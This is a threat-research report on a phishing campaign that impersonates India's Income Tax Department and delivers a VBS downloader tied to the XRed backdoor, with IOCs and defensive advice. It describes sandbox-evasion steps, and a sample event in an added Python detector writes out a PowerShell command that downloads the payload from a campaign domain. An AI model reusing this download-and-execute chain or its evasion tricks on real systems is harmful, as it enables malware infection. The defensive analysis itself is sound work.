XRed Malware Campaign Targets Multinational Organizations
10 December 2025
By Samantha Clarke, Hiwot Mendahun, Ankit Gupta and the Mimecast Threat Research Team
- Malware campaign impersonating the Indian Ministry of Finance and Income Tax Department
- Low-volume, strategically targeted campaign predominantly spanning financial services, professional services, and corporate services sectors across UK and US businesses with entity in India
- VBS script downloads and executes malicious payload from compromised infrastructure
- Emails predominantly originate from Japanese ASNs using outdated email clients and non-authenticated mail servers
Campaign Overview
The Mimecast Threat Research team has identified an ongoing malware campaign that leverages fraudulent office memorandums impersonating the Income Tax Department, Government of India. Organizations being targeted primarily contain Indian subsidiaries and have a UK or US based head office. Analysis reveals threat actors demonstrate sophisticated target selection, focusing on medium-to-large enterprises (typically 1,000+ employees) in B2B sectors, particularly financial services, professional services, and corporate administration.
Active since October 2025, this campaign employs social engineering tactics designed to exploit the urgency associated with tax compliance and potential penalties. Recipients receive emails containing links that purport to show the various tax violations the business has committed.
Key email attributes
- Japanese Infrastructure: Emails originate from IP addresses associated with Japanese Autonomous System Numbers, suggesting compromised systems or deliberate infrastructure choices to evade regional security controls.
- Legacy Email Clients: Email headers reveal the use of Foxmail and outdated versions of Microsoft Outlook (indicated by X-Mailer values), which may help bypass modern email security controls that focus on current threat patterns.
- Schema-less URLs: Malicious links sometimes appear without standard URL schemas (missing "http://" or "https://"), potentially evading basic URL filtering mechanisms.
- Unauthenticated Sending: Messages originate from mail servers requiring no authentication, a characteristic that enables easier spoofing but also provides detection opportunities.
Once the user clicks on the link, they are taken to the following page, which mimics official government communications.
These pages feature both Hindi and English text and reference Section 271(1)(c) of the Income Tax Act, which pertains to penalties for concealment of income or furnishing inaccurate particulars. The notice demands submission of documents within 72 hours and includes a "Download Documents" button that serves as the initial infection vector.
Technical Infection Chain
When victims click the "Download Documents" button, they unknowingly download a malicious VBS (Visual Basic Script) file, typically named "Tax Penalty Notice.vbs." Upon execution, this script contacts a remote server and downloads an executable file from a suspicious domain. Based on analysis of the command and control infrastructure, one of the campaigns observed appears linked to the Xred malware family.
When a recipient opens the malicious VBS file, a security warning is shown asking the user whether to continue opening the file. If the user continues, the script executes automatically without requiring additional user interaction.
The script first attempts to relaunch itself in a hidden window to avoid detection, ensuring its operations remain invisible to the user. Upon initialization, the script creates a directory at C:\SystemUpdates if it does not already exist. All subsequent actions are logged to C:\SystemUpdates\update_log.txt, including start and end times of the script execution. This logging mechanism provides the threat actors with visibility into successful infections and may assist in troubleshooting failed deployment attempts.
After establishing its operational environment, the script introduces a random delay between 8 and 15 seconds. This delay serves as an anti-analysis technique, potentially evading automated sandbox environments that expect immediate malicious behaviour within short analysis windows. Following the delay period, the script constructs and executes a PowerShell command designed to download an executable file from the remote location https://googlevip.shop/216.250.104.166ClientSetup[.]exe.
The downloaded file is saved locally as C:\SystemUpdates\216.250.104.166ClientSetup[.]exe. If the download completes successfully and the file exists on the local system, the PowerShell command proceeds to execute the payload silently, preventing any user notification or consent dialogs. One campaign observed appears to be linked to the XRed malware, whose primary function is a trojan backdoor. Once a system is infected, XRed can perform numerous malicious activities:
- Data Exfiltration: It collects sensitive system information (e.g., username, MAC address, computer name) and transmits it to the attacker.
- Keylogging: It records keystrokes to steal credentials for emails, social media, banking, and cryptocurrency accounts.
- Remote Control: The attacker can execute various commands remotely, including capturing screenshots, accessing the command line, and listing, downloading, or deleting files.
- Persistence: It uses registry keys and hidden directories (such as C:\ProgramData\Synaptics\) to maintain a persistent presence on the system.
- Additional Payloads: It can download and install other types of malware onto the compromised machine.
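As an added example (not code from the report or from Mimecast), the following toy detector encodes the endpoint behaviours described above: wscript.exe spawning PowerShell that downloads into C:\SystemUpdates, the script's own update_log.txt, an executable launched from the staging directory, and writes to the XRed persistence directory. The Sysmon-like event shape, the field names and the exact PowerShell wording in the sample are assumptions.

```python
# Added example: a toy detector for the VBS -> PowerShell -> payload chain above.
# Event shape (Sysmon-like dicts) and the PowerShell wording are assumptions.
import re
STAGING_DIR = r"c:\systemupdates"                 # created by the VBS (from the report)
LOG_FILE = r"c:\systemupdates\update_log.txt"     # script's own log (from the report)
PERSIST_DIR = r"c:\programdata\synaptics"         # XRed persistence dir (from the report)
CAMPAIGN_DOMAINS = ("googlevip.shop", "dadasf.qpon", "googleaxc.shop", "googlem.com")
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient")

def classify(ev: dict) -> list[str]:
    """Return the names of the detections an event triggers ([] if none)."""
    hits = []
    img = ev.get("image", "").lower()
    parent = ev.get("parent_image", "").lower()
    cmd = ev.get("command_line", "").lower()
    if ev["event"] == "process_create":
        # Script host spawning PowerShell that downloads into the staging directory
        if parent.endswith("wscript.exe") and img.endswith("powershell.exe"):
            if DOWNLOAD_RE.search(cmd) and STAGING_DIR in cmd:
                hits.append("vbs_powershell_download_to_systemupdates")
            if any(d in cmd for d in CAMPAIGN_DOMAINS):
                hits.append("campaign_domain_in_cmdline")
        # Any executable launched out of the staging directory
        if img.startswith(STAGING_DIR + "\\") and img.endswith(".exe"):
            hits.append("exe_launched_from_systemupdates")
    elif ev["event"] == "file_create":
        target = ev.get("target", "").lower()
        if target == LOG_FILE:
            hits.append("vbs_update_log_created")
        elif target.startswith(PERSIST_DIR + "\\"):
            hits.append("xred_persistence_dir_write")
    return hits

def scan(events: list[dict]) -> dict[str, list[str]]:
    """Map each detection name to the ids of the events that fired it."""
    out: dict[str, list[str]] = {}
    for ev in events:
        for name in classify(ev):
            out.setdefault(name, []).append(ev["id"])
    return out

SAMPLE_EVENTS = [  # constructed telemetry, not real captures
    {"id": "e1", "event": "file_create", "target": r"C:\SystemUpdates\update_log.txt"},
    {"id": "e2", "event": "process_create", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -w hidden (New-Object Net.WebClient).DownloadFile('https://googlevip.shop/216.250.104.166ClientSetup.exe','C:\SystemUpdates\216.250.104.166ClientSetup.exe')"},
    {"id": "e3", "event": "process_create", "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\SystemUpdates\216.250.104.166ClientSetup.exe", "command_line": ""},
]
```

Running `scan(SAMPLE_EVENTS)` returns one hit per detection name; the staging-directory checks are the ones worth keeping even if the campaign rotates domains.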
Mimecast Protection
The Mimecast Threat Research team has identified multiple attributes within this campaign and incorporated them into our detection capabilities. We continue to monitor for infrastructure changes and technique evolution as threat actors adapt their operations.
Targets
Primary Region: India, or predominantly UK and US businesses that have an entity in India. Non-random selection, with consistent focus on medium-to-large organizations (1,000+ employees) operating multi-jurisdictional environments.
Industries Affected: Across many industries, with elevated concentration in financial services, professional services (accounting, legal, consulting), corporate administration, supply chain/logistics, and manufacturing sectors. The campaign shows preference for B2B-focused organizations with complex vendor ecosystems and cross-border operations.
Indicators of Compromise (IOCs)
Sender Email Addresses
- urabe@kcc.zaq.ne.jp
- hase.3@jcom.zaq.ne.jp
- akomai@jcom.zaq.ne.jp
- servant@jcom.zaq.ne.jp
- sho552004@jcom.zaq.ne.jp
Malicious Files
- Hash (Xred-related): 0447426535047cae9870c99e8b66d8030c9b1492856445ef630c9c07a3fb42da
- Hash: 5178a2e904e239eb02b836227e48c0a99b02031a91136395a6c70a81d0ef3ee1
Malicious Domains
- googlevip[.]shop/
- dadasf[.]qpon/
- googleaxc[.]shop/
- googlem[.]com/
Recommendations
User Security Awareness
- Educate users about the increasing prevalence of government agency impersonation, emphasizing that legitimate tax authorities typically do not send urgent payment or document demands via email with downloadable attachments.
- Verification protocols: Establish clear procedures for employees to verify suspicious government communications through official channels before taking any action.
- Regional awareness: For organizations with operations in India, conduct targeted training on local tax authority communication methods and common impersonation tactics. Organizations matching the target profile (medium-to-large enterprises with Indian subsidiaries in financial or professional services sectors) should prioritize awareness training for finance and compliance personnel with access to Indian entity operations.
Proactive Threat Hunting
- Email log analysis: Search email receipt logs for messages originating from the identified sender domains and email addresses, particularly those directed to finance, compliance, or operations personnel with Indian entity responsibilities.
- URL log analysis: Search URL logs for technical indicators associated with these campaigns.
Organizations operating in or conducting business with India should remain vigilant for similar campaigns and ensure their security controls account for geographically targeted threats that may bypass region-agnostic detection methods. Organizations with 1,000+ employees and substantial Indian operations face elevated risk due to the campaign's demonstrated targeting patterns.